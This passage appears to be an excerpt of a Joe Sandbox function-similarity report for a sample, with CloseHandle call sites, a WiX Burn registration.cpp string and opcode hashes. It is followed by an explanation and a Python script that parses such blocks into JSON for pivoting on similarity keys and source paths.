                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 00929959
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to update name and publisher.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 3535843008-1652864479
                                                                                                                                                                  • Opcode ID: 10537e41bfd5ee7e9fcfb4038c13318b52c664218baeae47c713a83f19f5af90
                                                                                                                                                                  • Instruction ID: 9d10c3e2bac63a7b9b5f4023f2e127cf60123c2a385386c41fe7e02c7e6dc113
                                                                                                                                                                  • Opcode Fuzzy Hash: 10537e41bfd5ee7e9fcfb4038c13318b52c664218baeae47c713a83f19f5af90
                                                                                                                                                                  • Instruction Fuzzy Hash: 71E09235B04319ABDB11AAA4EC0BBFEB7609B80719F10015AB206601D1C9B489D4CA81
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(00057AF8,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092B9FC
                                                                                                                                                                  • CloseHandle.KERNEL32(E8057400,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092BA0D
                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFF71C,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092BA1E
                                                                                                                                                                  • CloseHandle.KERNEL32(BD830005,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092BA30
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  • Opcode ID: 25c516680f10c8c44216f0d64a0bbdf4a943fc99736cfecb5b5eee80953c627f
                                                                                                                                                                  • Instruction ID: e7dfe7cfc4e8a1a3fa3b11b341973f7f3b674f0b9fe847a6c254945d746e30f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 25c516680f10c8c44216f0d64a0bbdf4a943fc99736cfecb5b5eee80953c627f
                                                                                                                                                                  • Instruction Fuzzy Hash: B4017C31411B10DFD7329F14ED08B56BBF4FF54752F008A2DE09A129A9C731A988DF81
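The function blocks above are Joe Sandbox's per-function similarity records: each one lists the API calls with their call-site addresses, the referenced strings with their xrefs, the memory dump the function was lifted from, and the similarity keys (API ID, String ID, API String ID, Opcode ID and the two fuzzy hashes) that the report uses to match functions across samples. The path string d:\a\wix4\wix4\src\burn\engine\registration.cpp visible in the Strings sections is a compiler-embedded source path from the WiX Toolset v4 Burn bootstrapper engine (the D:\a\<repo>\<repo> layout is the GitHub Actions Windows runner workspace), so these particular registry-writing functions belong to a statically linked installer engine rather than to bespoke malware code; that is worth knowing before pivoting on their hashes. The parser below is an added example and is not Joe Sandbox code: it turns this listing format into JSON-friendly records and provides three pivots (API String ID groups, call sites of a named API, and embedded source paths). SAMPLE is an excerpt copied from two of the blocks above with the Associated lines trimmed; the record layout, the function names and the assumption that a block is complete once its Instruction Fuzzy Hash line has been seen are mine.

```python
"""Parse Joe Sandbox per-function 'Similarity' blocks into structured records.

Added example, not part of the Joe Sandbox report or its tooling.
"""
import json
import re
from collections import defaultdict

# Section headings exactly as they appear in the report listing.
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# e.g. RegCloseKey.ADVAPI32(00000000,00916DA2,...), ref: 0092997D
API_RE = re.compile(r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# Compiler-embedded Windows source paths, e.g. d:\a\wix4\wix4\src\burn\engine\registration.cpp
SRC_PATH_RE = re.compile(r"^[A-Za-z]:\\.*\.(?:c|cpp|cc|cxx|h|hpp)$", re.IGNORECASE)

# Excerpt copied from two blocks of the report above (Associated lines trimmed).
SAMPLE = r"""
APIs
• RegCloseKey.ADVAPI32(00000000,00916DA2,00000002,00000001,00000000,00000000,?,?,?,?,?,?,00932F8D,00916DA2,00000001,00000001), ref: 0092997D
Strings
• Failed to update name and publisher., xrefs: 009293EF
• d:\a\wix4\wix4\src\burn\engine\registration.cpp, xrefs: 00929959
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Close
• String ID: Failed to update name and publisher.$d:\a\wix4\wix4\src\burn\engine\registration.cpp
• API String ID: 3535843008-1652864479
• Opcode ID: 10537e41bfd5ee7e9fcfb4038c13318b52c664218baeae47c713a83f19f5af90
• Instruction ID: 9d10c3e2bac63a7b9b5f4023f2e127cf60123c2a385386c41fe7e02c7e6dc113
• Opcode Fuzzy Hash: 10537e41bfd5ee7e9fcfb4038c13318b52c664218baeae47c713a83f19f5af90
• Instruction Fuzzy Hash: 71E09235B04319ABDB11AAA4EC0BBFEB7609B80719F10015AB206601D1C9B489D4CA81
APIs
• CloseHandle.KERNEL32(00057AF8,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092B9FC
• CloseHandle.KERNEL32(E8057400,00000000,009180B3,?,009177FE,009187BB,?,009180B3,?,?,?,?), ref: 0092BA0D
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 25c516680f10c8c44216f0d64a0bbdf4a943fc99736cfecb5b5eee80953c627f
• Instruction ID: e7dfe7cfc4e8a1a3fa3b11b341973f7f3b674f0b9fe847a6c254945d746e30f4
• Opcode Fuzzy Hash: 25c516680f10c8c44216f0d64a0bbdf4a943fc99736cfecb5b5eee80953c627f
• Instruction Fuzzy Hash: B4017C31411B10DFD7329F14ED08B56BBF4FF54752F008A2DE09A129A9C731A988DF81
"""


def _new_record():
    return {"apis": [], "strings": [], "dump": {}, "similarity": {}}


def parse_blocks(text):
    """Return one record per function block.

    Assumption: a block is complete once its 'Instruction Fuzzy Hash' line has
    been seen; the next section heading then opens a new record. Sections may be
    absent (the CloseHandle block has no Strings section).
    """
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            if cur is None or "Instruction Fuzzy Hash" in cur["similarity"]:
                cur = _new_record()
                records.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue  # only bullet items carry data
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                cur["apis"].append({"func": m["func"], "module": m["module"],
                                    "args": m["args"].split(","), "ref": m["ref"]})
        elif section == "Strings":
            text_part, sep, xrefs = item.rpartition(", xrefs: ")
            if sep:
                cur["strings"].append({"text": text_part, "xrefs": xrefs.split(", ")})
        elif section in ("Memory Dump Source", "Joe Sandbox IDA Plugin"):
            key, _, value = item.partition(":")  # 'Associated' repeats, so keep a list
            cur["dump"].setdefault(key.strip(), []).append(value.strip())
        elif section == "Similarity":
            key, _, value = item.partition(":")  # values may themselves contain ':' (drive letters)
            cur["similarity"][key.strip()] = value.strip()
    return records


def group_by_api_string_id(records):
    """Map each API String ID (the cross-sample pivot key) to the Opcode IDs sharing it."""
    groups = defaultdict(list)
    for r in records:
        key = r["similarity"].get("API String ID")
        if key:
            groups[key].append(r["similarity"].get("Opcode ID", ""))
    return dict(groups)


def api_call_sites(records, func):
    """All 'ref:' addresses at which the named API is called, in listing order."""
    return [a["ref"] for r in records for a in r["apis"] if a["func"] == func]


def source_paths(records):
    """Compiler-embedded source paths from the Strings sections (code-origin attribution)."""
    return sorted({s["text"] for r in records for s in r["strings"] if SRC_PATH_RE.match(s["text"])})


if __name__ == "__main__":
    recs = parse_blocks(SAMPLE)
    print(json.dumps({"blocks": len(recs),
                      "by_api_string_id": group_by_api_string_id(recs),
                      "CloseHandle_sites": api_call_sites(recs, "CloseHandle"),
                      "source_paths": source_paths(recs)}, indent=2))
```

To use it on a full report, feed the text of the code-analysis section to parse_blocks and pivot on the API String ID groups; blocks whose source_paths point into a known third-party engine such as the Burn engine can be set aside so that hash comparisons concentrate on the functions that are actually specific to the sample.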